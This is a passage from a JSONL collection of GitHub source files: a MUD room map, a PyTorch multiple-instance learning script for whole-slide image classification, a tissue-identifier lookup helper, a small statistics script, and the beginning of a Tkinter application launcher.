False),\n\tExit('up', 'guanwai/kedian2', False),\n\tExit('east', 'guanwai/jishi', False),\n]\nkedian=Room('guanwai/kedian', u'客店', None, 0, exits)\n\nexits = [\n\tExit('down', 'guanwai/kedian', False),\n]\nkedian2=Room('guanwai/kedian2', u'客店二楼', None, 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/shanhaiguan', False),\n\tExit('southwest', 'beijing/road3', False),\n]\nlaolongtou=Room('guanwai/laolongtou', u'老龙头', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/houyuan', False),\n\tExit('south', 'guanwai/liangongs', False),\n\tExit('east', 'guanwai/liangonge', False),\n]\nliangong=Room('guanwai/liangong', u'练功房', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/liangong', False),\n]\nliangonge=Room('guanwai/liangonge', u'东练功房', None, 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/liangong', False),\n]\nliangongs=Room('guanwai/liangongs', u'南练功房', None, 0, exits)\n\nexits = [\n\tExit('southdown', 'guanwai/tianchi1', False),\n\tExit('west', 'guanwai/luming', False),\n\tExit('east', 'guanwai/tianhuo', False),\n\tExit('northeast', 'guanwai/damen', False),\n]\nlongmen=Room('guanwai/longmen', u'龙门峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/baiyun', False),\n\tExit('northdown', 'guanwai/famu', False),\n\tExit('east', 'guanwai/longmen', False),\n]\nluming=Room('guanwai/luming', u'鹿鸣峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/kedian', False),\n]\nmajiu=Room('guanwai/majiu', u'马厩', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/ermenkan', False),\n\tExit('southeast', 'guanwai/caoguduo', False),\n]\nmantianxing=Room('guanwai/mantianxing', u'满天星', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/baihe', False),\n\tExit('eastup', 'guanwai/milin2', False),\n]\nmilin1=Room('guanwai/milin1', u'密林', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southup', 'guanwai/milin3', False),\n\tExit('westdown', 'guanwai/milin1', False),\n]\nmilin2=Room('guanwai/milin2', u'密林', 'guanwai', 0, exits)\n\nexits = [\n\tExit('eastup', 'guanwai/heifengkou', False),\n\tExit('northdown', 
'guanwai/milin2', False),\n]\nmilin3=Room('guanwai/milin3', u'密林', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road8', False),\n\tExit('north', 'guanwai/nancheng', False),\n]\nmuqiao=Room('guanwai/muqiao', u'木桥', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southeast', 'guanwai/tulu', False),\n\tExit('west', 'guanwai/rouguan', False),\n\tExit('south', 'guanwai/muqiao', False),\n\tExit('north', 'guanwai/jishi', False),\n]\nnancheng=Room('guanwai/nancheng', u'南城', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road3', False),\n\tExit('northeast', 'guanwai/road4', False),\n]\nningyuan=Room('guanwai/ningyuan', u'宁远', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southeast', 'guanwai/damen', False),\n\tExit('westdown', 'guanwai/xiaotianchi', False),\n]\npubu=Room('guanwai/pubu', u'长白瀑布', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/shanhaiguan', False),\n\tExit('northeast', 'guanwai/road2', False),\n]\nroad1=Room('guanwai/road1', u'官道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/road1', False),\n\tExit('northeast', 'guanwai/road3', False),\n]\nroad2=Room('guanwai/road2', u'官道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/road2', False),\n\tExit('north', 'guanwai/ningyuan', False),\n]\nroad3=Room('guanwai/road3', u'官道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/ningyuan', False),\n\tExit('northeast', 'guanwai/road5', False),\n]\nroad4=Room('guanwai/road4', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/road4', False),\n\tExit('north', 'guanwai/road6', False),\n]\nroad5=Room('guanwai/road5', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road5', False),\n\tExit('north', 'guanwai/road7', False),\n]\nroad6=Room('guanwai/road6', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road6', False),\n\tExit('north', 'guanwai/road8', False),\n]\nroad7=Room('guanwai/road7', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road7', False),\n\tExit('north', 'guanwai/muqiao', False),\n]\nroad8=Room('guanwai/road8', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/nancheng', False),\n]\nrouguan=Room('guanwai/rouguan', u'香肉馆', None, 0, exits)\n\nexits = [\n\tExit('southeast', 'guanwai/laolongtou', False),\n\tExit('northeast', 'guanwai/road1', False),\n]\nshanhaiguan=Room('guanwai/shanhaiguan', u'山海关', 'guanwai', 0, exits)\n\nexits = [\n\tExit('out', 'guanwai/huandi2', False),\n]\nshanshenmiao=Room('guanwai/shanshenmiao', u'山神庙', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/tulu', False),\n]\nshichang=Room('guanwai/shichang', u'采石场', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/chufang', False),\n\tExit('south', 'guanwai/houyuan', False),\n\tExit('east', 'guanwai/taxue', False),\n]\nshizilu=Room('guanwai/shizilu', u'石路', None, 0, exits)\n\nexits = [\n]\nsonghuajiang=Room('guanwai/songhuajiang', u'松花江面', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/shizilu', False),\n]\ntaxue=Room('guanwai/taxue', u'踏雪院', None, 0, exits)\n\nexits = [\n\tExit('eastup', 'guanwai/huagai', False),\n\tExit('northup', 'guanwai/longmen', False),\n\tExit('south', 'guanwai/tianchi2', False),\n\tExit('westup', 'guanwai/baiyun', False),\n]\ntianchi1=Room('guanwai/tianchi1', u'白头山天池', 'guanwai', 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/tianchi1', False),\n]\ntianchi2=Room('guanwai/tianchi2', u'白头山天池', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/longmen', False),\n\tExit('south', 
'guanwai/huagai', False),\n]\ntianhuo=Room('guanwai/tianhuo', u'天豁峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/yuzhu', False),\n]\ntiyun=Room('guanwai/tiyun', u'梯云峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/nancheng', False),\n\tExit('east', 'guanwai/shichang', False),\n]\ntulu=Room('guanwai/tulu', u'土路', 'guanwai', 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/xiaoxiang', False),\n]\ntuwu=Room('guanwai/tuwu', u'小土屋', 'guanwai', 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/dongcheng', False),\n]\ntuyaoguan=Room('guanwai/tuyaoguan', u'土窑馆', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/heifengkou', False),\n\tExit('eastup', 'guanwai/pubu', False),\n]\nxiaotianchi=Room('guanwai/xiaotianchi', u'小天池', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/xiaoyuan', False),\n\tExit('north', 'guanwai/houyuan', False),\n]\nxiaowu=Room('guanwai/xiaowu', u'小茅屋', None, 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/tuwu', False),\n\tExit('east', 'guanwai/beicheng', False),\n]\nxiaoxiang=Room('guanwai/xiaoxiang', u'小巷', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/baihe', False),\n\tExit('north', 'guanwai/xiaowu', False),\n]\nxiaoyuan=Room('guanwai/xiaoyuan', u'小院子', None, 0, exits)\n\nexits = [\n]\nxiuxishi=Room('guanwai/xiuxishi', u'休息室', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/dongcheng', False),\n\tExit('northeast', 'guanwai/xuedi2', False),\n]\nxuedi1=Room('guanwai/xuedi1', u'雪地', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/xuedi1', False),\n\tExit('east', 'guanwai/xuedi3', False),\n]\nxuedi2=Room('guanwai/xuedi2', u'雪地', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/xuedi2', False),\n\tExit('north', 'guanwai/chuanchang', False),\n]\nxuedi3=Room('guanwai/xuedi3', u'雪地', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northeast', 'guanwai/baiyun', False),\n\tExit('north', 'guanwai/tiyun', False),\n]\nyuzhu=Room('guanwai/yuzhu', u'玉柱峰', 'guanwai', 0, exits)\n\n","repo_name":"jiabiao/mushpy","sub_path":"hell/rooms/d/guanwai.py","file_name":"guanwai.py","file_ext":"py","file_size_in_byte":10912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72885469050","text":"\r\n# !/usr/bin/env python\r\nimport sys\r\nimport os\r\nos.environ[\"HDF5_USE_FILE_LOCKING\"] = \"FALSE\"\r\nimport yaml\r\nfrom pprint import pprint\r\n\r\nimport argparse\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom utils.utils import save_model, Struct, set_seed, Wandb_Writer\r\nfrom datasets.datasets import build_HDF5_feat_dataset\r\nfrom architecture.Attention import Attention_Gated as Attention\r\nfrom architecture.Attention import Attention_with_Classifier\r\nfrom architecture.network import Classifier_1fc, DimReduction\r\nfrom utils.utils import MetricLogger, SmoothedValue, adjust_learning_rate\r\nfrom utils.utils import get_cam_1d\r\nimport torchmetrics\r\nfrom timm.utils import accuracy\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\ndef get_arguments():\r\n parser = argparse.ArgumentParser('Patch classification training', add_help=False)\r\n parser.add_argument('--config', dest='config', default='config/camelyon_natural_supervised_config.yml',\r\n help='settings of Tip-Adapter in yaml format')\r\n parser.add_argument(\r\n \"--eval-only\", action=\"store_true\", help=\"evaluation only\"\r\n )\r\n parser.add_argument(\r\n \"--seed\", type=int, default=3, help=\"set 
the random seed to ensure reproducibility\"\r\n )\r\n parser.add_argument('--wandb_mode', default='disabled', choices=['offline', 'online', 'disabled'],\r\n help='the model of wandb')\r\n parser.add_argument(\r\n \"--n_shot\", type=int, default=-1, help=\"number of wsi images\"\r\n )\r\n parser.add_argument(\r\n \"--w_loss\", type=float, default=1.0, help=\"number of query token\"\r\n )\r\n parser.add_argument('--numGroup', default=4, type=int)\r\n parser.add_argument('--total_instance', default=4, type=int)\r\n parser.add_argument('--numGroup_test', default=4, type=int)\r\n parser.add_argument('--total_instance_test', default=4, type=int)\r\n parser.add_argument('--grad_clipping', default=5, type=float)\r\n args = parser.parse_args()\r\n return args\r\n\r\ndef train_one_epoch(classifier, attention, dimReduction, UClassifier, criterion, data_loader, optimizer0,\r\n optimizer1, device, epoch, conf, log_writer=None, distill='MaxMinS'):\r\n \"\"\"\r\n Trains the given network for one epoch according to given criterions (loss functions)\r\n \"\"\"\r\n\r\n # Set the network to training mode\r\n classifier.train()\r\n dimReduction.train()\r\n attention.train()\r\n UClassifier.train()\r\n metric_logger = MetricLogger(delimiter=\" \")\r\n metric_logger.add_meter('lr', SmoothedValue(window_size=1, fmt='{value:.6f}'))\r\n header = 'Epoch: [{}]'.format(epoch)\r\n print_freq = 100\r\n\r\n for data_it, data in enumerate(metric_logger.log_every(data_loader, print_freq, header)):\r\n # # Calculate and set new learning rate\r\n adjust_learning_rate(optimizer0, epoch + data_it/len(data_loader), conf)\r\n adjust_learning_rate(optimizer1, epoch + data_it/len(data_loader), conf)\r\n\r\n\r\n # for data_it, data in enumerate(data_loader, start=epoch * len(data_loader)):\r\n # Move input batch onto GPU if eager execution is enabled (default), else leave it on CPU\r\n # Data is a dict with keys `input` (patches) and `{task_name}` (labels for given task)\r\n tfeat_tensor = data['input'].to(device, dtype=torch.float32)\r\n tfeat_tensor = tfeat_tensor[0]\r\n tslideLabel = data['label'].to(device)\r\n\r\n instance_per_group = conf.total_instance // conf.numGroup\r\n feat_index = torch.randperm(tfeat_tensor.shape[0]).to(device)\r\n index_chunk_list = torch.tensor_split(feat_index, conf.numGroup)\r\n\r\n\r\n slide_pseudo_feat = []\r\n slide_sub_preds = []\r\n slide_sub_labels = []\r\n\r\n for tindex in index_chunk_list:\r\n slide_sub_labels.append(tslideLabel)\r\n subFeat_tensor = torch.index_select(tfeat_tensor, dim=0, index=tindex)\r\n tmidFeat = dimReduction(subFeat_tensor)\r\n tAA = attention(tmidFeat).squeeze(0)\r\n tattFeats = torch.einsum('ns,n->ns', tmidFeat, tAA) ### n x fs\r\n tattFeat_tensor = torch.sum(tattFeats, dim=0).unsqueeze(0) ## 1 x fs\r\n tPredict = classifier(tattFeat_tensor) ### 1 x 2\r\n slide_sub_preds.append(tPredict)\r\n\r\n patch_pred_logits = get_cam_1d(classifier, tattFeats.unsqueeze(0)).squeeze(0) ### cls x n\r\n patch_pred_logits = torch.transpose(patch_pred_logits, 0, 1) ## n x cls\r\n patch_pred_softmax = torch.softmax(patch_pred_logits, dim=1) ## n x cls\r\n\r\n _, sort_idx = torch.sort(patch_pred_softmax[:, -1], descending=True)\r\n topk_idx_max = sort_idx[:instance_per_group].long()\r\n topk_idx_min = sort_idx[-instance_per_group:].long()\r\n topk_idx = torch.cat([topk_idx_max, topk_idx_min], dim=0)\r\n\r\n MaxMin_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx) ##########################\r\n max_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx_max)\r\n af_inst_feat = 
tattFeat_tensor\r\n\r\n if distill == 'MaxMinS':\r\n slide_pseudo_feat.append(MaxMin_inst_feat)\r\n elif distill == 'MaxS':\r\n slide_pseudo_feat.append(max_inst_feat)\r\n elif distill == 'AFS':\r\n slide_pseudo_feat.append(af_inst_feat)\r\n\r\n slide_pseudo_feat = torch.cat(slide_pseudo_feat, dim=0) ### numGroup x fs\r\n\r\n ## optimization for the first tier\r\n slide_sub_preds = torch.cat(slide_sub_preds, dim=0) ### numGroup x fs\r\n slide_sub_labels = torch.cat(slide_sub_labels, dim=0) ### numGroup\r\n loss0 = criterion(slide_sub_preds, slide_sub_labels).mean()\r\n optimizer0.zero_grad()\r\n loss0.backward(retain_graph=True)\r\n torch.nn.utils.clip_grad_norm_(dimReduction.parameters(), conf.grad_clipping)\r\n torch.nn.utils.clip_grad_norm_(attention.parameters(), conf.grad_clipping)\r\n torch.nn.utils.clip_grad_norm_(classifier.parameters(), conf.grad_clipping)\r\n optimizer0.step()\r\n\r\n ## optimization for the second tier\r\n gSlidePred = UClassifier(slide_pseudo_feat)\r\n loss1 = criterion(gSlidePred, tslideLabel).mean()\r\n optimizer1.zero_grad()\r\n loss1.backward()\r\n torch.nn.utils.clip_grad_norm_(UClassifier.parameters(), conf.grad_clipping)\r\n optimizer1.step()\r\n\r\n\r\n metric_logger.update(lr=optimizer0.param_groups[0]['lr'])\r\n metric_logger.update(loss0=loss0.item())\r\n metric_logger.update(loss1=loss1.item())\r\n\r\n if log_writer is not None:\r\n \"\"\" We use epoch_1000x as the x-axis in tensorboard.\r\n This calibrates different curves when batch size changes.\r\n \"\"\"\r\n log_writer.log('loss0', loss0, commit=False)\r\n log_writer.log('loss1', loss1)\r\n\r\n# Disable gradient calculation during evaluation\r\n@torch.no_grad()\r\ndef evaluate(classifier, attention, dimReduction, UClassifier, criterion, data_loader, device, conf, header, distill='MaxMinS'):\r\n\r\n # Set the network to evaluation mode\r\n classifier.eval()\r\n attention.eval()\r\n dimReduction.eval()\r\n UClassifier.eval()\r\n\r\n y_pred = []\r\n y_true = []\r\n instance_per_group = conf.total_instance // conf.numGroup\r\n\r\n metric_logger = MetricLogger(delimiter=\" \")\r\n\r\n for data in metric_logger.log_every(data_loader, 100, header):\r\n tfeat = data['input'].to(device, dtype=torch.float32)\r\n tfeat = tfeat[0]\r\n tslideLabel = data['label'].to(device)\r\n\r\n midFeat = dimReduction(tfeat)\r\n\r\n AA = attention(midFeat, isNorm=False).squeeze(0) ## N\r\n\r\n feat_index = torch.randperm(tfeat.shape[0]).to(device)\r\n index_chunk_list = torch.tensor_split(feat_index, conf.numGroup)\r\n\r\n slide_d_feat = []\r\n\r\n\r\n for tindex in index_chunk_list:\r\n tmidFeat = midFeat.index_select(dim=0, index=tindex)\r\n\r\n tAA = AA.index_select(dim=0, index=tindex)\r\n tAA = torch.softmax(tAA, dim=0)\r\n tattFeats = torch.einsum('ns,n->ns', tmidFeat, tAA) ### n x fs\r\n tattFeat_tensor = torch.sum(tattFeats, dim=0).unsqueeze(0) ## 1 x fs\r\n\r\n patch_pred_logits = get_cam_1d(classifier, tattFeats.unsqueeze(0)).squeeze(0) ### cls x n\r\n patch_pred_logits = torch.transpose(patch_pred_logits, 0, 1) ## n x cls\r\n patch_pred_softmax = torch.softmax(patch_pred_logits, dim=1) ## n x cls\r\n\r\n _, sort_idx = torch.sort(patch_pred_softmax[:, -1], descending=True)\r\n\r\n if distill == 'MaxMinS':\r\n topk_idx_max = sort_idx[:instance_per_group].long()\r\n topk_idx_min = sort_idx[-instance_per_group:].long()\r\n topk_idx = torch.cat([topk_idx_max, topk_idx_min], dim=0)\r\n d_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx)\r\n slide_d_feat.append(d_inst_feat)\r\n elif distill == 'MaxS':\r\n 
topk_idx_max = sort_idx[:instance_per_group].long()\r\n topk_idx = topk_idx_max\r\n d_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx)\r\n slide_d_feat.append(d_inst_feat)\r\n elif distill == 'AFS':\r\n slide_d_feat.append(tattFeat_tensor)\r\n\r\n slide_d_feat = torch.cat(slide_d_feat, dim=0)\r\n\r\n gSlidePred = UClassifier(slide_d_feat)\r\n allSlide_pred_softmax = torch.softmax(gSlidePred, dim=1)\r\n\r\n\r\n\r\n loss = criterion(allSlide_pred_softmax, tslideLabel)\r\n acc1 = accuracy(allSlide_pred_softmax, tslideLabel, topk=(1,))[0]\r\n metric_logger.update(loss=loss.item())\r\n metric_logger.meters['acc1'].update(acc1.item(), n=1)\r\n\r\n\r\n y_pred.append(allSlide_pred_softmax)\r\n y_true.append(tslideLabel)\r\n\r\n y_pred = torch.cat(y_pred, dim=0)\r\n y_true = torch.cat(y_true, dim=0)\r\n\r\n AUROC_metric = torchmetrics.AUROC(num_classes = conf.n_class, average = 'macro').to(device)\r\n AUROC_metric(y_pred, y_true)\r\n auroc = AUROC_metric.compute().item()\r\n F1_metric = torchmetrics.F1Score(num_classes = conf.n_class, average = 'macro').to(device)\r\n F1_metric(y_pred, y_true)\r\n f1_score = F1_metric.compute().item()\r\n\r\n print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f} auroc {AUROC:.3f} f1_score {F1:.3f}'\r\n .format(top1=metric_logger.acc1, losses=metric_logger.loss, AUROC=auroc, F1=f1_score))\r\n\r\n return auroc, metric_logger.acc1.global_avg, f1_score, metric_logger.loss.global_avg\r\n\r\n\r\ndef main():\r\n # Load config file\r\n args = get_arguments()\r\n\r\n # get config\r\n with open(args.config, \"r\") as ymlfile:\r\n c = yaml.load(ymlfile, Loader=yaml.FullLoader)\r\n c.update(vars(args))\r\n conf = Struct(**c)\r\n\r\n\r\n group_name = 'ds_%s_%s_arch_dtfd-mil_%sepochs' % (conf.dataset, conf.pretrain, conf.train_epoch)\r\n log_writer = Wandb_Writer(group_name=group_name, mode=args.wandb_mode, name=args.seed)\r\n conf.ckpt_dir = log_writer.wandb.dir[:-5] + 'saved_models'\r\n if conf.wandb_mode == 'disabled':\r\n conf.ckpt_dir = os.path.join(conf.ckpt_dir, group_name)\r\n os.makedirs(conf.ckpt_dir, exist_ok=True)\r\n print(\"Used config:\");\r\n pprint(vars(conf));\r\n\r\n # Prepare dataset\r\n set_seed(args.seed)\r\n\r\n # define datasets and dataloaders\r\n train_data, val_data, test_data = build_HDF5_feat_dataset(os.path.join(conf.data_dir, 'patch_feats_pretrain_%s.h5'%conf.pretrain), conf)\r\n\r\n train_loader = DataLoader(train_data, batch_size=conf.B, shuffle=True,\r\n num_workers=conf.n_worker, pin_memory=conf.pin_memory, drop_last=True)\r\n val_loader = DataLoader(val_data, batch_size=conf.B, shuffle=False,\r\n num_workers=conf.n_worker, pin_memory=conf.pin_memory, drop_last=False)\r\n test_loader = DataLoader(test_data, batch_size=conf.B, shuffle=False,\r\n num_workers=conf.n_worker, pin_memory=conf.pin_memory, drop_last=False)\r\n\r\n # define network\r\n classifier = Classifier_1fc(conf.D_inner, conf.n_class, 0).to(device)\r\n attention = Attention(conf.D_inner).to(device)\r\n dimReduction = DimReduction(conf.D_feat, conf.D_inner).to(device)\r\n attCls = Attention_with_Classifier(L=conf.D_inner, num_cls=conf.n_class, droprate=0).to(device)\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n trainable_parameters = []\r\n trainable_parameters += list(classifier.parameters())\r\n trainable_parameters += list(attention.parameters())\r\n trainable_parameters += list(dimReduction.parameters())\r\n\r\n optimizer_adam0 = torch.optim.Adam(trainable_parameters, lr=conf.lr, weight_decay=conf.wd)\r\n optimizer_adam1 = 
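torch.optim.Adam(attCls.parameters(), lr=conf.lr, weight_decay=conf.wd)  # tier 2 of DTFD-MIL: steps only the slide-level attention classifier, while optimizer_adam0 above updates dimReduction/attention/classifier\r\n    optimizer_adam1 = 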
torch.optim.Adam(attCls.parameters(), lr=conf.lr, weight_decay=conf.wd)\r\n\r\n best_state = {'epoch':-1, 'val_acc':0, 'val_auc':0, 'val_f1':0, 'test_acc':0, 'test_auc':0, 'test_f1':0}\r\n for epoch in range(conf.train_epoch):\r\n\r\n train_one_epoch(classifier, attention, dimReduction, attCls,\r\n criterion, train_loader, optimizer_adam0, optimizer_adam1, device, epoch, conf, log_writer)\r\n\r\n\r\n val_auc, val_acc, val_f1, val_loss = evaluate(classifier, attention, dimReduction, attCls, criterion, val_loader, device, conf, 'Val')\r\n test_auc, test_acc, test_f1, test_loss = evaluate(classifier, attention, dimReduction, attCls, criterion, test_loader, device, conf, 'Test')\r\n\r\n if log_writer is not None:\r\n log_writer.log('perf/val_acc1', val_acc, commit=False)\r\n log_writer.log('perf/val_auc', val_auc, commit=False)\r\n log_writer.log('perf/val_f1', val_f1, commit=False)\r\n log_writer.log('perf/val_loss', val_loss, commit=False)\r\n log_writer.log('perf/test_acc1', test_acc, commit=False)\r\n log_writer.log('perf/test_auc', test_auc, commit=False)\r\n log_writer.log('perf/test_f1', test_f1, commit=False)\r\n log_writer.log('perf/test_loss', test_loss, commit=False)\r\n\r\n if val_f1 + val_auc > best_state['val_f1'] + best_state['val_auc']:\r\n best_state['epoch'] = epoch\r\n best_state['val_auc'] = val_auc\r\n best_state['val_acc'] = val_acc\r\n best_state['val_f1'] = val_f1\r\n best_state['test_auc'] = test_auc\r\n best_state['test_acc'] = test_acc\r\n best_state['test_f1'] = test_f1\r\n # log_writer.summary('best_acc', val_acc)\r\n # save_model(\r\n # conf=conf, model=net, optimizer=optimizer, epoch=epoch, is_best=True)\r\n print('\\n')\r\n\r\n # save_model(\r\n # conf=conf, model=net, optimizer=optimizer, epoch=epoch, is_last=True)\r\n print(\"Results on best epoch:\")\r\n print(best_state)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dazhangyu123/ACMIL","sub_path":"Step3_WSI_classification_DTFD.py","file_name":"Step3_WSI_classification_DTFD.py","file_ext":"py","file_size_in_byte":14863,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"21815022456","text":"#!/usr/bin/env python\n\n#\n#\n#\n#\n#\n\n#\n# IMPORT SOURCES:\n#\n#\n\n#\n# Get FMA identifiers.\n#\n\n# PRE-CODE\nimport faulthandler\nfaulthandler.enable()\n\n# IMPORTS\n\n# Imports for recognizing modules.\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../..\"))\n\n# Import modules.\nfrom gnomics.objects.user import User\nimport gnomics.objects.tissue\n\n# Other imports.\nimport json\nimport requests\nimport timeit\nimport urllib.error\nimport urllib.parse\nimport urllib.request\n\n# MAIN\ndef main():\n fma_unit_tests(\"TS-0171\", \"\", \"\")\n \n# Get FMA identifier.\ndef get_fma_id(tissue, user = None):\n fma_array = []\n \n for iden in gnomics.objects.auxiliary_files.identifier.filter_identifiers(tissue.identifiers, [\"fma\", \"fma id\", \"fmaid\", \"fma identifier\"]):\n if iden[\"identifier\"] not in fma_array:\n fma_array.append(iden[\"identifier\"])\n \n if fma_array:\n return fma_array\n \n ids_completed = []\n for ident in tissue.identifiers:\n if (ident[\"identifier_type\"].lower() in [\"caloha\", \"caloha id\", \"caloha identifier\"]) and ident[\"identifier\"] not in ids_completed:\n ids_completed.append(ident[\"identifier\"])\n for xref in gnomics.objects.tissue.Tissue.caloha_obj(tissue, user = user)[\"primaryTopic\"][\"hasDbXref\"]:\n if \"FMA\" in xref:\n 
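# record the hit as an FMA identifier so the early-return cache at the top of this function serves repeat calls\n                    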
gnomics.objects.tissue.Tissue.add_identifier(tissue, identifier = xref, identifier_type = \"FMA ID\", source = \"OpenPHACTS\")\n                    fma_array.append(xref)\n    \n    return fma_array\n\n# UNIT TESTS\ndef fma_unit_tests(caloha_id, openphacts_app_id, openphacts_app_key):\n    user = User(openphacts_app_id = openphacts_app_id, openphacts_app_key = openphacts_app_key)\n    \n    caloha_tiss = gnomics.objects.tissue.Tissue(identifier = caloha_id, identifier_type = \"CALOHA ID\", source = \"OpenPHACTS\")\n    for fma in get_fma_id(caloha_tiss, user = user):\n        print(\"- %s\" % fma)\n    \n# MAIN\nif __name__ == \"__main__\": main()","repo_name":"Superraptor/Gnomics","sub_path":"gnomics/objects/tissue_files/fma.py","file_name":"fma.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"}
{"seq_id":"2975599387","text":"import copy\nfrom math import sqrt\n\ndef get_data():\n\tl = []\n\twhile True:\n\t\tdata = input('value: ')\n\t\tif data=='q':\n\t\t\tbreak\n\t\ttry:\n\t\t\tdata = float(data)\n\t\texcept ValueError:\n\t\t\tcontinue\n\t\tl.append(data)\n\treturn l\n\ndef mean(data):\n\treturn sum(data)/len(data)\n\ndef median(data):\n\tdata_c = copy.copy(data)\n\tdata_c.sort()\n\treturn data_c[int(len(data_c)/2)]\n\ndef std_dev(data, avg):\n\tsum_dev_sqr = 0\n\tfor num in data:\n\t\tdev = avg - num\n\t\tsum_dev_sqr = sum_dev_sqr + dev * dev\n\treturn sqrt(sum_dev_sqr/(len(data)-1))\n\n\ndef main():\n\tdata = get_data()\n\tprint(data)\n\tprint(median(data))\n\nmain()\n\n","repo_name":"vlaksi/OsnovneRacunarstva-BMI","sub_path":"Predavanja/08 Kolekcije podataka/Predavanja/p/primer1.py","file_name":"primer1.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"24908823684","text":"#!/usr/bin/env python3\n# TkRootMenu.py (tsouchlarakis@gmail.com) A custom menu\n# MIT License\n# alsa-utils, sudo, ssh-askpass, xscreensaver, xdotool\n\nimport os, sys, shutil\n#from PIL import ImageTk, Image\nfrom tkinter import Tk, Button, Scale, Menu, HORIZONTAL, TRUE, FALSE, E, W, S, N\nfrom Executables import __sudo_cmd__, __terminal__, __editor__, __file_manager__, __browser__, __basic__, __net__, __dev__, __media__, __games__, __fs__, __admin__, __utils__, __config__, __help__, __pc_options__\n\nncnss = \"0\"\n\ndef runCommand(app, prm=\"\", hlpr=0, sudo=0):\n\n    runstr = \"\"\n\n    if sudo == 1: # Prefix sudo\n        runstr += __sudo_cmd__ + \" \"\n\n    runstr += \"nice -n \" + ncnss + \" \"\n\n    if hlpr == 1: # Append helper\n        runstr += __terminal__ + \" -e \"\n    elif hlpr == 2:\n        runstr += __editor__ + \" \"\n    elif hlpr == 3:\n        runstr += __file_manager__ + \" \"\n    elif hlpr == 4:\n        runstr += __browser__ + \" \"\n\n    runstr += app + \" \" + prm + \" &\" # Postfix app, params and background\n\n    print(runstr)\n    os.system(runstr)\n\nclass TkRootMenu(Tk):\n\n    def __init__(self, master):\n\n        self.master = master\n\n        self.master.title(\"Root Menu\")\n\n        opts = ((\"*resizable\", FALSE), (\"*tearOff\", FALSE))\n\n        for opt, cond in opts:\n            self.master.option_add(opt, cond)\n\n        self.master.geometry('105x50+64+64')\n\n        #self.u = Button(master, width=1, height=1, text=u\"\\u21E7\", command=lambda: runCommand(\"xdotool key 'Super_L+Up'\"))\n        self.l = Button(master, width=3, height=1, text=u\"\\u21E6\", command=lambda: runCommand(\"xdotool key 'Super_L+Left'\"))\n        self.r = Button(master, width=3, height=1, text=u\"\\u21E8\", command=lambda: runCommand(\"xdotool key 'Super_L+Right'\"))\n        #self.d = Button(master, 
